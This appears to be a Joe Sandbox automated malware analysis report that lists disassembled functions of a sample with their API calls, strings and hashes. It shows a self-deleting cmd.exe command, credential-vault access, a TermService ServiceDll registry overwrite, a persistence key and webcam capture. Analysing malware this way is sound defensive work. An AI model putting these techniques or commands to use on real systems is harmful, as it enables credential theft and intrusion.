Instruction Fuzzy Hash: 1A41407190010AFBCB04EFA1D9969EDBB78AF50309F1045BEF102721A1EB386F55DB68

Uniqueness

Uniqueness Score: -1.00%

Function 00415F21 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 74sleepprocessmemoryCOMMON

Download Yara Rule

APIs

GetCurrentProcess.KERNEL32(00000000,?,75A901C0,00000000), ref: 00415F32
IsWow64Process.KERNEL32(00000000,?,75A901C0,00000000), ref: 00415F39
VirtualAlloc.KERNEL32(00000000,000000FF,00001000,00000040,?,75A901C0,00000000), ref: 00415F5B
GetWindowsDirectoryA.KERNEL32(00000000,00000104,?,75A901C0,00000000), ref: 00415F69
lstrlenA.KERNEL32(00000000,?,75A901C0,00000000), ref: 00415F70
CreateProcessA.KERNEL32(00000000,00000000,00000000,00000000,00000000,08000000,00000000,00000000,?,?,?,75A901C0,00000000), ref: 00415FB1
Sleep.KERNEL32(000003E8,?,75A901C0,00000000), ref: 00415FC0

Strings

\System32\cmd.exe, xrefs: 00415F79

Memory Dump Source

Source File: 0000000E.00000002.2878947374.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000E.00000002.2878947374.0000000000552000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 0000000E.00000002.2878947374.0000000000554000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_400000_dbkyovyK.jbxd

Yara matches

Similarity

API ID: Process$AllocCreateCurrentDirectorySleepVirtualWindowsWow64lstrlen
String ID: \System32\cmd.exe
API String ID: 3151064845-2003734499
Opcode ID: dc901119b21e94098e840bfbb0b1404969421ceab7900f3aa0df34179a149720
Instruction ID: 7708ee430ed35acb90b2a80bb995161ddff212f6da6e96a5191d5c77f133a72b
Opcode Fuzzy Hash: dc901119b21e94098e840bfbb0b1404969421ceab7900f3aa0df34179a149720
Instruction Fuzzy Hash: 9211D371A00318BBEB209BB5DC4DFDB7B6CEF48751F104431F609E6080DA749E45CAA9

Uniqueness

Uniqueness Score: -1.00%

Function 00408179 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 62timenetworkCOMMON

Download Yara Rule

APIs

StrStrA.SHLWAPI(?,Date), ref: 00408187
InternetTimeToSystemTimeA.WININET(00000007,?,00000000,?,Date), ref: 004081B1
GetLastError.KERNEL32(?,Date), ref: 004081C1
SystemTimeToFileTime.KERNEL32(?,?,?,Date), ref: 004081CB
GetLastError.KERNEL32(?,Date), ref: 004081D5
WsFileTimeToDateTime.WEBSERVICES(?,?,00000000,?,Date), ref: 004081E1
__aulldiv.LIBCMT ref: 004081F9

Strings

Date, xrefs: 00408181

Memory Dump Source

Source File: 0000000E.00000002.2878947374.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000E.00000002.2878947374.0000000000552000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 0000000E.00000002.2878947374.0000000000554000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_400000_dbkyovyK.jbxd

Yara matches

Similarity

API ID: Time$ErrorFileLastSystem$DateInternet__aulldiv
String ID: Date
API String ID: 2581324138-1812262276
Opcode ID: 9a9312bef8b76c73a95e09c48203284b5edff22e1599418dadb897de547aad3c
Instruction ID: 9da6ce4b8f7fa7e8f95c7edbc44b9eb06fe2fb040dff41c7ba91850e1fa9d0d7
Opcode Fuzzy Hash: 9a9312bef8b76c73a95e09c48203284b5edff22e1599418dadb897de547aad3c
Instruction Fuzzy Hash: BF117076900209BAEB109BB5CC49EDFBF7CEF4C710F004536F601F6160E6349945C6A5

Uniqueness

Uniqueness Score: -1.00%

Function 0040EB8E Relevance: 14.1, APIs: 5, Strings: 3, Instructions: 56registrystringCOMMON

Download Yara Rule

APIs

lstrcpyW.KERNEL32(?,Software\Microsoft\Windows\CurrentVersion\App Paths\), ref: 0040EBCA
lstrcatW.KERNEL32(?,thunderbird.exe), ref: 0040EBD8
RegOpenKeyExW.ADVAPI32(80000002,?,00000000,00000001,0040CD60,?,00000000), ref: 0040EBF1
RegQueryValueExW.ADVAPI32(0040CD60,Path,00000000,?,?,?,?,00000000), ref: 0040EC0E
RegCloseKey.ADVAPI32(0040CD60,?,00000000), ref: 0040EC17

Strings

Path, xrefs: 0040EC06
Software\Microsoft\Windows\CurrentVersion\App Paths\, xrefs: 0040EBC4
thunderbird.exe, xrefs: 0040EBD0

Memory Dump Source

Source File: 0000000E.00000002.2878947374.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000E.00000002.2878947374.0000000000552000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 0000000E.00000002.2878947374.0000000000554000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_400000_dbkyovyK.jbxd

Yara matches

Similarity

API ID: CloseOpenQueryValuelstrcatlstrcpy
String ID: Path$Software\Microsoft\Windows\CurrentVersion\App Paths\$thunderbird.exe
API String ID: 3135247354-1374996286
Opcode ID: c9ac04e21ea7167adeaa7221929ee9da7a9aceb5194e67dfdeb95ac6b56bef0e
Instruction ID: 8943bccbeb079d63c70707d13255f87890d21e1236c0d2e1b43ea364f643c71d
Opcode Fuzzy Hash: c9ac04e21ea7167adeaa7221929ee9da7a9aceb5194e67dfdeb95ac6b56bef0e
Instruction Fuzzy Hash: A4113CB2A4011CBFEB10EB94DD49FEA7BBCEB18744F1044BAF609E2150E6749E04CB65

Uniqueness

Uniqueness Score: -1.00%

Function 004167CA Relevance: 12.4, APIs: 4, Strings: 3, Instructions: 173comCOMMON

Download Yara Rule

APIs

CoInitialize.OLE32(00000000), ref: 004167DC
CoCreateInstance.OLE32(004193E0,00000000,00000001,0041C890,004162A2), ref: 00416809
CoUninitialize.OLE32 ref: 0041698F

Part of subcall function 00416AF8: CoCreateInstance.OLE32(00419420,00000000,00000001,0041C870,?,00000000,756FE550,00000000,?,?,00416840), ref: 00416B2E

CoCreateInstance.OLE32(00419430,00000000,00000001,0041C880,?), ref: 0041685A

Part of subcall function 00416540: CoTaskMemFree.OLE32(?,?,?,00416920), ref: 0041654E

Strings

vids, xrefs: 00416895
Source, xrefs: 00416869
Grabber, xrefs: 00416878

Memory Dump Source

Source File: 0000000E.00000002.2878947374.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000E.00000002.2878947374.0000000000552000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 0000000E.00000002.2878947374.0000000000554000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_400000_dbkyovyK.jbxd

Yara matches

Similarity

API ID: CreateInstance$FreeInitializeTaskUninitialize
String ID: Grabber$Source$vids
API String ID: 533512943-4200688928
Opcode ID: 86e8333d789976bf9be73f0a125ae244be6b35dc32b072f82c596e8ef0fc40f5
Instruction ID: 16888cc9fc0b3a3f1d3160e62141c5cd9145469eac604049143f553e19eb3a36
Opcode Fuzzy Hash: 86e8333d789976bf9be73f0a125ae244be6b35dc32b072f82c596e8ef0fc40f5
Instruction Fuzzy Hash: 355189B1A00219AFDB14DFA5C884EEFB7B9AF44305F1540AEE905AB260C779AD81CB54

Uniqueness

Uniqueness Score: -1.00%

Function 00403978 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 108processthreadCOMMON

Download Yara Rule

APIs

Part of subcall function 00414CE8: RegDeleteKeyW.ADVAPI32(80000001,?), ref: 00414CEF

TerminateThread.KERNEL32(00000000,?,?), ref: 0041560F
GetModuleFileNameA.KERNEL32(00000000,?,00000104,?,?), ref: 00415681
CreateProcessA.KERNEL32(00000000,?,00000000,00000000,00000000,08000000,00000000,00000000,?,?,?,?,?,?,?), ref: 004156F1
CloseHandle.KERNEL32(?,?,?,?,?,?), ref: 00415700
CloseHandle.KERNEL32(?,?,?,?,?,?), ref: 00415705
ExitProcess.KERNEL32 ref: 00415708

Strings

cmd.exe /C ping 1.2.3.4 -n 2 -w 1000 > Nul & Del /f /q , xrefs: 0041568A

Memory Dump Source

Source File: 0000000E.00000002.2878947374.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000E.00000002.2878947374.0000000000552000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 0000000E.00000002.2878947374.0000000000554000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_400000_dbkyovyK.jbxd

Yara matches

Similarity

API ID: CloseHandleProcess$CreateDeleteExitFileModuleNameTerminateThread
String ID: cmd.exe /C ping 1.2.3.4 -n 2 -w 1000 > Nul & Del /f /q
API String ID: 3630425516-84290196
Opcode ID: fcbdf54cf043c2aacc3a8f3feb47d8a1eb1b8de11c1bed28b14dda9a70ae837c
Instruction ID: 844b97aa6395f7c92cf7411b9824b4cf4e5ffc549e3fceaaf3462342311d81cf
Opcode Fuzzy Hash: fcbdf54cf043c2aacc3a8f3feb47d8a1eb1b8de11c1bed28b14dda9a70ae837c
Instruction Fuzzy Hash: 6131B271A00619BFDB11EBA0DC85FEF777DAB44304F00446AF905B7191DA34AE488BA8

Uniqueness

Uniqueness Score: -1.00%

Function 0041141F Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 77registryCOMMON

Download Yara Rule

APIs

Part of subcall function 0040460A: lstrlenW.KERNEL32(00415E06,00000000,?,00415E06,00000000,?,00000000,.bss,00000000,?,75A901C0,00000000), ref: 00404613
Part of subcall function 0040460A: lstrlenW.KERNEL32(00415E06,?,00415E06,00000000,?,00000000,.bss,00000000,?,75A901C0,00000000), ref: 0040462A
Part of subcall function 0040460A: lstrcpyW.KERNEL32(75A901C0,00415E06), ref: 00404649

RegOpenKeyExW.ADVAPI32(80000002,?,00000000,00000102,?,SYSTEM\CurrentControlSet\Services\TermService\Parameters,74DF0F00,?,?,?,00411FEE,?,%SystemRoot%\System32\termsrv.dll,?,?), ref: 0041144E
RegSetValueExW.ADVAPI32(?,00000000,00000000,00000002,00000000,?,ServiceDll,?,?,?,00411FEE,?,%SystemRoot%\System32\termsrv.dll,?,?), ref: 0041148F
RegCloseKey.ADVAPI32(?,?,?,00411FEE,?,%SystemRoot%\System32\termsrv.dll,?,?), ref: 004114BB
RegCloseKey.ADVAPI32(?,?,?,00411FEE,?,%SystemRoot%\System32\termsrv.dll,?,?), ref: 004114D0
RegCloseKey.ADVAPI32(00000000,?,?,00411FEE,?,%SystemRoot%\System32\termsrv.dll), ref: 004114E9

Strings

SYSTEM\CurrentControlSet\Services\TermService\Parameters, xrefs: 0041142C
ServiceDll, xrefs: 0041146A

Memory Dump Source

Source File: 0000000E.00000002.2878947374.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000E.00000002.2878947374.0000000000552000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 0000000E.00000002.2878947374.0000000000554000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_400000_dbkyovyK.jbxd

Yara matches

Similarity

API ID: Close$lstrlen$OpenValuelstrcpy
String ID: SYSTEM\CurrentControlSet\Services\TermService\Parameters$ServiceDll
API String ID: 3136860555-387424650
Opcode ID: 5721524a9c5bc50503aa9c812bd19fdafbcf7b22aafc1a2232b08af259650893
Instruction ID: ac91cb34629d849a706557e2657be3ce9502fb39194a3bc472cc3102b74fdedb
Opcode Fuzzy Hash: 5721524a9c5bc50503aa9c812bd19fdafbcf7b22aafc1a2232b08af259650893
Instruction Fuzzy Hash: 58215131A00219ABCF11AFD1CC859EEFF79EF54B44F10407BE60172161D7785A81CB98

Uniqueness

Uniqueness Score: -1.00%

Function 0040DE78 Relevance: 12.3, APIs: 1, Strings: 6, Instructions: 53libraryCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(vaultcli.dll,00000000,0040DB38), ref: 0040DE80

Part of subcall function 0041473A: lstrcmpA.KERNEL32(?,E[A,?,74DF0F00,00415B45), ref: 00414773

Strings

VaultGetItem, xrefs: 0040DED4
VaultOpenVault, xrefs: 0040DE96
VaultFree, xrefs: 0040DEFF
VaultEnumerateItems, xrefs: 0040DEBE
vaultcli.dll, xrefs: 0040DE79
VaultCloseVault, xrefs: 0040DEA8

Memory Dump Source

Source File: 0000000E.00000002.2878947374.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000E.00000002.2878947374.0000000000552000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 0000000E.00000002.2878947374.0000000000554000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_400000_dbkyovyK.jbxd

Yara matches

Similarity

API ID: LibraryLoadlstrcmp
String ID: VaultCloseVault$VaultEnumerateItems$VaultFree$VaultGetItem$VaultOpenVault$vaultcli.dll
API String ID: 2493137890-3967309459
Opcode ID: e5bff56148cc7de3ac3b8c0dde03083fdcefcb4af5f3ce939150e690f6ef060c
Instruction ID: a853dde062c029c648754f1811a81385c8c32ad5bd1b9ee19d86dce6ce34077d
Opcode Fuzzy Hash: e5bff56148cc7de3ac3b8c0dde03083fdcefcb4af5f3ce939150e690f6ef060c
Instruction Fuzzy Hash: A111FE34E047428BDB25EF7191117D7B6D2EBC1344F14C87F94AA97381EB38A881CB6A

Uniqueness

Uniqueness Score: -1.00%

Function 00415884 Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 49registrystringCOMMON

Download Yara Rule

APIs

RegOpenKeyExW.ADVAPI32(80000001,SOFTWARE\_rptls,00000000,000F003F,?,00000208,00551C00,?,?,?,?,00415933), ref: 004158A4
RegCreateKeyExW.ADVAPI32(80000001,SOFTWARE\_rptls,00000000,00000000,00000000,000F003F,00000000,?,?,?,?,?,?,00415933), ref: 004158C1
lstrlenW.KERNEL32(00551C00,?,?,?,?,00415933,?,?,?,?,0040683C,75A901C0,00000000,00000000), ref: 004158CD
RegSetValueExW.ADVAPI32(?,Install,00000000,00000001,00551C00,00000000,?,?,?,?,00415933,?,?,?,?,0040683C), ref: 004158E3
RegCloseKey.ADVAPI32(?,?,?,?,?,00415933,?,?,?,?,0040683C,75A901C0,00000000,00000000), ref: 004158EC

Strings

Install, xrefs: 004158DB
SOFTWARE\_rptls, xrefs: 00415898, 0041589E, 004158BB

Memory Dump Source

Source File: 0000000E.00000002.2878947374.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000E.00000002.2878947374.0000000000552000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 0000000E.00000002.2878947374.0000000000554000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_400000_dbkyovyK.jbxd

Yara matches

Similarity

API ID: CloseCreateOpenValuelstrlen
String ID: Install$SOFTWARE\_rptls
API String ID: 2036214137-3226779556
Opcode ID: 557c7ed55dcc80a3d1cac0f7d0141f29fb00d5af56f68ae45be528362585ead0
Instruction ID: cb603a7a619c4af1c970f9aeb9956303df49299b50a5cec5b9896e4e229344ac
Opcode Fuzzy Hash: 557c7ed55dcc80a3d1cac0f7d0141f29fb00d5af56f68ae45be528362585ead0
Instruction Fuzzy Hash: EEF0AFB1600018BFE7205B86DC4DEEF7F7CEBC6791B10007AF905E1011D6605E40C6B8

Uniqueness

Uniqueness Score: -1.00%

Function 004158F7 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 46COMMON

Download Yara Rule

APIs

GetModuleFileNameW.KERNEL32(00000000,00551C00,00000208,00000000,00000000,?,?,?,0040683C,75A901C0,00000000,00000000,?,?,?,00000000), ref: 00415913
IsUserAnAdmin.SHELL32 ref: 00415919

Part of subcall function 00413893: GetCurrentProcess.KERNEL32(00000008,00000000,75A901C0,?,75A901C0,00000000,?,?,?,?,00417610,?), ref: 004138A5
Part of subcall function 00413893: OpenProcessToken.ADVAPI32(00000000,?,75A901C0,00000000,?,?,?,?,00417610,?), ref: 004138AC
Part of subcall function 00413893: GetTokenInformation.KERNELBASE(00000000,00000014(TokenIntegrityLevel),?,00000004,75A901C0,?,75A901C0,00000000,?,?,?,?,00417610,?), ref: 004138CA
Part of subcall function 00413893: FindCloseChangeNotification.KERNEL32(00000000,?,75A901C0), ref: 004138DF

Part of subcall function 00415884: RegOpenKeyExW.ADVAPI32(80000001,SOFTWARE\_rptls,00000000,000F003F,?,00000208,00551C00,?,?,?,?,00415933), ref: 004158A4
Part of subcall function 00415884: RegCreateKeyExW.ADVAPI32(80000001,SOFTWARE\_rptls,00000000,00000000,00000000,000F003F,00000000,?,?,?,?,?,?,00415933), ref: 004158C1
Part of subcall function 00415884: lstrlenW.KERNEL32(00551C00,?,?,?,?,00415933,?,?,?,?,0040683C,75A901C0,00000000,00000000), ref: 004158CD
Part of subcall function 00415884: RegSetValueExW.ADVAPI32(?,Install,00000000,00000001,00551C00,00000000,?,?,?,?,00415933,?,?,?,?,0040683C), ref: 004158E3
Part of subcall function 00415884: RegCloseKey.ADVAPI32(?,?,?,?,?,00415933,?,?,?,?,0040683C,75A901C0,00000000,00000000), ref: 004158EC

FindResourceW.KERNEL32(00000000,00000066,WM_DSP,?,?,?,?,0040683C,75A901C0,00000000,00000000,?,?,?,00000000), ref: 00415942
LoadResource.KERNEL32(00000000,00000000,?,?,?,?,0040683C,75A901C0,00000000,00000000,?,?,?,00000000,?,75A901C0), ref: 0041594C
SizeofResource.KERNEL32(00000000,00000000,?,?,?,?,0040683C,75A901C0,00000000,00000000,?,?,?,00000000,?,75A901C0), ref: 00415956
LockResource.KERNEL32(00000000,?,?,?,?,0040683C,75A901C0,00000000,00000000,?,?,?,00000000,?,75A901C0,00000000), ref: 0041595D

Part of subcall function 004157F0: EntryPoint.DBKYOVYK(00000800,00000000,00000000,?,?,?,?,?,0041596F,?,?,?,0040683C,75A901C0,00000000,00000000), ref: 00415801
Part of subcall function 004157F0: VirtualProtect.KERNEL32(00000000,000007D0,00000040,?,00000000,00000000,?,?,?,?,?,0041596F,?,?,?,0040683C), ref: 00415832
Part of subcall function 004157F0: VirtualAlloc.KERNEL32(00000600,000001FE,00001000,00000040,?,?,?,?,?,0041596F,?,?,?,0040683C,75A901C0,00000000), ref: 00415845
Part of subcall function 004157F0: GetWindowsDirectoryW.KERNEL32(00000000,00000104,?,?,?,?,?,0041596F,?,?,?,0040683C,75A901C0,00000000,00000000), ref: 00415853
Part of subcall function 004157F0: lstrlenW.KERNEL32(00000000,?,?,?,?,?,0041596F,?,?,?,0040683C,75A901C0,00000000,00000000), ref: 0041585A

Strings

WM_DSP, xrefs: 00415938

Memory Dump Source

Source File: 0000000E.00000002.2878947374.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000E.00000002.2878947374.0000000000552000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 0000000E.00000002.2878947374.0000000000554000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_400000_dbkyovyK.jbxd

Yara matches

Similarity

API ID: Resource$CloseFindOpenProcessTokenVirtuallstrlen$AdminAllocChangeCreateCurrentDirectoryEntryFileInformationLoadLockModuleNameNotificationPointProtectSizeofUserValueWindows
String ID: WM_DSP
API String ID: 2174978806-506093727
Opcode ID: 4495feb1c5241a7bdfbed53523d86fea1273708f815886b736bb37abe78b4fda
Instruction ID: b7148150c69d3e7077034616d82331736933b4659d4ff151a3090d09011baeda
Opcode Fuzzy Hash: 4495feb1c5241a7bdfbed53523d86fea1273708f815886b736bb37abe78b4fda
Instruction Fuzzy Hash: FDF0C231A40601BBE72037B66C5DFDF2A6CEBC2761F04003AF402E6291EA688C80866D

Uniqueness

Uniqueness Score: -1.00%

Function 00406D65 Relevance: 12.3, APIs: 3, Strings: 4, Instructions: 20libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(USER32.DLL,?,004140B9,?,75A901C0,00000000,?,?,?,?,?,?,?,00406AFD,?,00000000), ref: 00406D6D
GetProcAddress.KERNEL32(00000000,MessageBoxA), ref: 00406D79
ExitProcess.KERNEL32 ref: 00406D9D

Strings

An assertion condition failed, xrefs: 00406D92
Assert, xrefs: 00406D8D
MessageBoxA, xrefs: 00406D73
USER32.DLL, xrefs: 00406D66

Memory Dump Source

Source File: 0000000E.00000002.2878947374.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000E.00000002.2878947374.0000000000552000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 0000000E.00000002.2878947374.0000000000554000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_400000_dbkyovyK.jbxd

Yara matches

Similarity

API ID: AddressExitLibraryLoadProcProcess
String ID: An assertion condition failed$Assert$MessageBoxA$USER32.DLL
API String ID: 881411216-1361702557
Opcode ID: 39c78e6fc20bd4423a576dc2d8ee0b10663eaf57dc5534fab84ca1edcd14ccae
Instruction ID: 272f7a4789a34d990315966e31ce143c91089590a0cf7a72930928de44057608
Opcode Fuzzy Hash: 39c78e6fc20bd4423a576dc2d8ee0b10663eaf57dc5534fab84ca1edcd14ccae
Instruction Fuzzy Hash: 3FD017B07D13023AEF102BB05D6EBE627099B04F09F25442AF545A62D1D6A94C94C52C

Uniqueness

Uniqueness Score: -1.00%

Function 00406FC2 Relevance: 12.3, APIs: 3, Strings: 4, Instructions: 14libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(USER32.DLL), ref: 00406FC7
GetProcAddress.KERNEL32(00000000,MessageBoxA), ref: 00406FD3
ExitProcess.KERNEL32 ref: 00406FF2

Strings

A pure virtual function was called. This is a fatal error, and indicates a serious error in the implementation of the application, xrefs: 00406FE7
MessageBoxA, xrefs: 00406FCD
PureCall, xrefs: 00406FE2
USER32.DLL, xrefs: 00406FC2

Memory Dump Source

Source File: 0000000E.00000002.2878947374.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000E.00000002.2878947374.0000000000552000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 0000000E.00000002.2878947374.0000000000554000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_400000_dbkyovyK.jbxd

Yara matches

Similarity

API ID: AddressExitLibraryLoadProcProcess
String ID: A pure virtual function was called. This is a fatal error, and indicates a serious error in the implementation of the application$MessageBoxA$PureCall$USER32.DLL
API String ID: 881411216-4134947204
Opcode ID: 69299dfebe20396bf329b3b4910db48d5a8a39ba7c294db0293e172ceade083c
Instruction ID: f0500bc87b2fc8c61eb391b677c986980f300b182929d705ff8288db0f4eed8c
Opcode Fuzzy Hash: 69299dfebe20396bf329b3b4910db48d5a8a39ba7c294db0293e172ceade083c
Instruction Fuzzy Hash: 77D0C9B03D03077AF7501BA05C7EFE93618AB04F05F10443AF605A42D1CAE85CD4C52D

Uniqueness

Uniqueness Score: -1.00%

Function 0040BF94 Relevance: 10.7, APIs: 7, Instructions: 234fileCOMMON

Download Yara Rule

APIs

CreateFileA.KERNEL32(?,80000000,00000007,00000000,00000003,00000000,00000000), ref: 0040BFB1
GetLastError.KERNEL32 ref: 0040BFBE
CloseHandle.KERNEL32(00000000), ref: 0040BFC5
GetFileSize.KERNEL32(00000000,00000000), ref: 0040BFD2
EntryPoint.DBKYOVYK(00000000), ref: 0040BFDE
ReadFile.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 0040C001
CloseHandle.KERNEL32(00000000), ref: 0040C008

Memory Dump Source

Source File: 0000000E.00000002.2878947374.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000E.00000002.2878947374.0000000000552000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 0000000E.00000002.2878947374.0000000000554000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_400000_dbkyovyK.jbxd

Yara matches

Similarity

API ID: File$CloseHandle$CreateEntryErrorLastPointReadSize
String ID:
API String ID: 1852644339-0
Opcode ID: 8a322a8821931a539f7f822517cd6fd3844ba59e7644a16c6775c17d63b6e8f8
Instruction ID: f2601c78dc16c0f00906ae06333de43f0fee526d232e0d9a438d68017c7c54ef
Opcode Fuzzy Hash: 8a322a8821931a539f7f822517cd6fd3844ba59e7644a16c6775c17d63b6e8f8
Instruction Fuzzy Hash: 2B810170D04145AAEB20ABA4DC85AEEBBB5AF45318F18817FE4417B2C3C7395D42CB59

Uniqueness

Uniqueness Score: -1.00%

Function 00416D82 Relevance: 10.7, APIs: 3, Strings: 3, Instructions: 184comCOMMON

Download Yara Rule

APIs

CoInitialize.OLE32(00000000), ref: 00416DA6
CoCreateInstance.OLE32(004193E0,00000000,00000001,0041C890,2FDCEB58,?,?), ref: 00416DC1

Part of subcall function 00416AF8: CoCreateInstance.OLE32(00419420,00000000,00000001,0041C870,?,00000000,756FE550,00000000,?,?,00416840), ref: 00416B2E

CoCreateInstance.OLE32(00419430,00000000,00000001,0041C880,2FDCEB1C,?,?,004193C0,2FDCEB5C,?,?), ref: 00416E1E

Part of subcall function 00416540: CoTaskMemFree.OLE32(?,?,?,00416920), ref: 0041654E

Part of subcall function 00406D65: LoadLibraryA.KERNEL32(USER32.DLL,?,004140B9,?,75A901C0,00000000,?,?,?,?,?,?,?,00406AFD,?,00000000), ref: 00406D6D
Part of subcall function 00406D65: GetProcAddress.KERNEL32(00000000,MessageBoxA), ref: 00406D79
Part of subcall function 00406D65: ExitProcess.KERNEL32 ref: 00406D9D

Strings

vids, xrefs: 00416E5D
Source, xrefs: 00416E33
Grabber, xrefs: 00416E40

Memory Dump Source

Source File: 0000000E.00000002.2878947374.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000E.00000002.2878947374.0000000000552000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 0000000E.00000002.2878947374.0000000000554000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_400000_dbkyovyK.jbxd

Yara matches

Similarity

API ID: CreateInstance$AddressExitFreeInitializeLibraryLoadProcProcessTask
String ID: Grabber$Source$vids
API String ID: 1453374265-4200688928
Opcode ID: 9dec264821d1b25b427dc11a9dca23b25eb95ff89bd8a185ce68623a2d52104f
Instruction ID: 259aa536c45e797f6ee6c43ec3c0488186146600ef50c90f8d49f83af6d4d850
Opcode Fuzzy Hash: 9dec264821d1b25b427dc11a9dca23b25eb95ff89bd8a185ce68623a2d52104f
Instruction Fuzzy Hash: 0A619935A00204AFCB24DF64C885A9AB7B5FF48714F1545AEF809AB290CB75FD81CF98

Uniqueness

Uniqueness Score: -1.00%

Function 00412657 Relevance: 10.6, APIs: 7, Instructions: 124filepipeCOMMON

Download Yara Rule

APIs

EntryPoint.DBKYOVYK(?), ref: 00412679
ReadFile.KERNEL32(00000000,00000000,?,00000000,00000000), ref: 00412695
MultiByteToWideChar.KERNEL32(00000001,00000000,00000000,000000FF,00000000,00000000,00000000,00000000), ref: 004126C5
EntryPoint.DBKYOVYK(00000000), ref: 004126D3
MultiByteToWideChar.KERNEL32(00000001,00000000,?,000000FF,00000000,00000000), ref: 004126F2
PeekNamedPipe.KERNEL32(?,00000000,00000000,00000000,?,00000000,?), ref: 00412767
GetLastError.KERNEL32(?,00000000), ref: 00412775

Memory Dump Source

Source File: 0000000E.00000002.2878947374.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000E.00000002.2878947374.0000000000552000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 0000000E.00000002.2878947374.0000000000554000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_400000_dbkyovyK.jbxd

Yara matches

Similarity

API ID: ByteCharEntryMultiPointWide$ErrorFileLastNamedPeekPipeRead
String ID:
API String ID: 1962659777-0
Opcode ID: 43bd31535a7308b22d7488020fef53e8f4ac40500a20dfc5466d928af681d1ef
Instruction ID: 278e07f31abe1187758821035d5abb23d10856983b003c58b8b7746d402165c2
Opcode Fuzzy Hash: 43bd31535a7308b22d7488020fef53e8f4ac40500a20dfc5466d928af681d1ef
Instruction Fuzzy Hash: C6417971A00119AFDB04ABA5CC95AEFBBB8EF08354F10056AF516F62D1DA785E408A68

Uniqueness

Uniqueness Score: -1.00%

Function 00409B57 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 66sleepprocessmemoryCOMMON

Download Yara Rule

APIs

VirtualAlloc.KERNEL32(00000000,000000FF,00001000,00000040,00000000,?,?), ref: 00409B7A
GetWindowsDirectoryA.KERNEL32(00000000,00000104), ref: 00409B88
lstrlenA.KERNEL32(00000000), ref: 00409B8F
CreateProcessA.KERNEL32(00000000,00000000,00000000,00000000,00000000,08000000,00000000,00000000,?,?), ref: 00409BD0
Sleep.KERNEL32(000003E8), ref: 00409BDF

Strings

\System32\cmd.exe, xrefs: 00409B98

Memory Dump Source

Source File: 0000000E.00000002.2878947374.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000E.00000002.2878947374.0000000000552000.00000040.00000400.00020000.00000000.sdmpDownload File
